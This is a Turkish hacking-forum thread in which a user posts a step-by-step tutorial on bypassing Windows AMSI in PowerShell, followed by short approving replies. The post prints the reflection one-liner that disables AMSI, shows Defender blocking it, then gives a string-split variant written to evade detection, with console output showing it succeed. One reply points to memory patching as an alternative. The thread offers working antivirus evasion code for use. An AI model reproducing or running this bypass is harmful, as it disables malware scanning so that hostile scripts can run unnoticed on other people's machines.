PowerShell AMSI Bypass Nasıl Yapılır?

Whoamiroot · 29 Tem 2025

Merhaba arkadaşlar,
Bugün sizlere PowerShell AMSI Bypass Nasıl Yapılır? Öğreticem.

PowerShell'deki amsi.dll Nedir?
PowerShell çalışırken arka planda bazı güvenlik önlemleri devrededir. Bunlardan biri de AMSI (Antimalware Scan Interface). Microsoft tarafından geliştirilen bu sistem, PowerShell'de çalışan script'leri antivirüs programlarına taratır.
PowerShell herhangi bir komut veya script çalıştırdığında, amsi.dll isimli dinamik bağlantı kitaplığı devreye girer ve bu içeriği analiz için antivirüse gönderir.
Peki Amsi Nasıl Bypass Edilir?
İnternette "amsi bypass" diye arattığınızda karşınıza birçok kaynak çıkacaktır. Bunlardan biri de LİNK sitesidir. Bu sitede birden fazla yöntem bulunuyor, fakat ben bugün size en basit ve sık kullanılan bir yöntemi göstereceğim..
Buradaki sitede 2. yöntem olan powershell'li scripti gördünüz sanırım
Bu kod Orjinal amsı bypass scriptidir:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Bu kodu direk yönetici olarak açtığınız powershell de çalıştırmaya kalkarsanız.

At line:1 char:1
+ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetF ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: ) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent

Böyle bir Hata alıcaksınız peki bu hata nedir?
Bu hata, Windows Defender veya sistemdeki başka bir güvenlik yazılımının PowerShell komutlarını gerçek zamanlı olarak taradığını ve bu komutun “tehlikeli” yani potansiyel olarak zararlı olduğunu algıladığını gösteriyor.
Peki bu kodu nasıl kullanıcaz?
Bu kodu antivirüsler engellemesin diye stringleri düz yazmak yerine şöyle parçaladık:

$amsi = [Ref].Assembly.GetType('Sys'+'tem.Managem'+'ent.Aut'+'omation.Amsi'+'Utils')
$field = $amsi.GetField('amsiIn'+'itFai'+'led','NonPu'+'blic,St'+'atic')
$field.SetValue($null,$true)

Yani stringleri böldük, + ile birleştirdik. Bu sayede antivirüs kodu tanıyamadı. Sonra da bu şekilde kodumuzu oluşturduk.
Şimdi çalıştırıyoruz

PS C:\WINDOWS\system32> $amsi = [Ref].Assembly.GetType('Sys'+'tem.Managem'+'ent.Aut'+'omation.Amsi'+'Utils')
PS C:\WINDOWS\system32> $field = $amsi.GetField('amsiIn'+'itFai'+'led','NonPu'+'blic,St'+'atic')
PS C:\WINDOWS\system32> $field.SetValue($null,$true)
PS C:\WINDOWS\system32>

Ve başarılı bir şekilde bypass işlemini bitirdik

Eğer Okuduysanız Teşekkürler. Okumadıysanız canınız sağolsun. iyi günler dilerim.

https://imgur.com/a/QR2TXTz

Kryzlo · 29 Tem 2025

Eline sağlık, konuyu görsellerle renklendirebilirsin.

Whoamiroot · 29 Tem 2025

Kryzlo' Alıntı:
Eline sağlık, konuyu görsellerle renklendirebilirsin.

2. Konum Çok profesyonel değilim de. Teşekkür ederim

slowbaskan123 · 29 Tem 2025

Zamanında az uğraşmadık;

Runtime Tüm Anti Virüsleri Atlatın! | Powershell FUD AMSI Bypass Kodu
C# Dilinde AMSI Bypass Örneği
Windows Anti Malware Tarama Sistemi (AMSI) Nedir? // AR-GE Melekleri Kulübü

Whoamiroot · 29 Tem 2025

slowbaskan123' Alıntı:
Zamanında az uğraşmadık;

Runtime Tüm Anti Virüsleri Atlatın! | Powershell FUD AMSI Bypass Kodu
C# Dilinde AMSI Bypass Örneği
Windows Anti Malware Tarama Sistemi (AMSI) Nedir? // AR-GE Melekleri Kulübü

Sağolun teşekkürler yeni şeyler öğrenebilirim.

legandrary · 29 Tem 2025

Whoamiroot' Alıntı:
Merhaba arkadaşlar,
Bugün sizlere PowerShell AMSI Bypass Nasıl Yapılır? Öğreticem.

PowerShell'deki amsi.dll Nedir?
PowerShell çalışırken arka planda bazı güvenlik önlemleri devrededir. Bunlardan biri de AMSI (Antimalware Scan Interface). Microsoft tarafından geliştirilen bu sistem, PowerShell'de çalışan script'leri antivirüs programlarına taratır.
PowerShell herhangi bir komut veya script çalıştırdığında, amsi.dll isimli dinamik bağlantı kitaplığı devreye girer ve bu içeriği analiz için antivirüse gönderir.
Peki Amsi Nasıl Bypass Edilir?
İnternette "amsi bypass" diye arattığınızda karşınıza birçok kaynak çıkacaktır. Bunlardan biri de LİNK sitesidir. Bu sitede birden fazla yöntem bulunuyor, fakat ben bugün size en basit ve sık kullanılan bir yöntemi göstereceğim..
Buradaki sitede 2. yöntem olan powershell'li scripti gördünüz sanırım
Bu kod Orjinal amsı bypass scriptidir:

Bu kodu direk yönetici olarak açtığınız powershell de çalıştırmaya kalkarsanız.

Böyle bir Hata alıcaksınız peki bu hata nedir?
Bu hata, Windows Defender veya sistemdeki başka bir güvenlik yazılımının PowerShell komutlarını gerçek zamanlı olarak taradığını ve bu komutun “tehlikeli” yani potansiyel olarak zararlı olduğunu algıladığını gösteriyor.
Peki bu kodu nasıl kullanıcaz?
Bu kodu antivirüsler engellemesin diye stringleri düz yazmak yerine şöyle parçaladık:

Yani stringleri böldük, + ile birleştirdik. Bu sayede antivirüs kodu tanıyamadı. Sonra da bu şekilde kodumuzu oluşturduk.
Şimdi çalıştırıyoruz

Ve başarılı bir şekilde bypass işlemini bitirdik

Eğer Okuduysanız Teşekkürler. Okumadıysanız canınız sağolsun. iyi günler dilerim.

https://imgur.com/a/QR2TXTz

Eline sağlık güzel olmuş

Whoamiroot · 29 Tem 2025

legandrary' Alıntı:
Eline sağlık güzel olmuş

Sağolun

YesSirBeast · 29 Tem 2025

Eline sağlık.

sametghack · 29 Tem 2025

Eline saglik

RichardJackson · 29 Tem 2025

Güzel özet. Alternatif olarak System.Runtime.InteropServices.Marshal::Copy() ile bellek düzeyinde patch de işe yarayabiliyor. Bu tarz basit obfuscation’lar hâlâ bazı Defender sürümlerinde geçerli. Paylaşım için teşekkürler Eline sağlık.

PowerShell AMSI Bypass Nasıl Yapılır?

Whoamiroot

Yeni üye

Kryzlo

Anka Team

Whoamiroot

Yeni üye

slowbaskan123

Kıdemli Üye

Whoamiroot

Yeni üye

legandrary

Hunter

Whoamiroot

Yeni üye

YesSirBeast

Üye

sametghack

Moderatör

RichardJackson

Katılımcı Üye

Sosyal medya sayfalarımız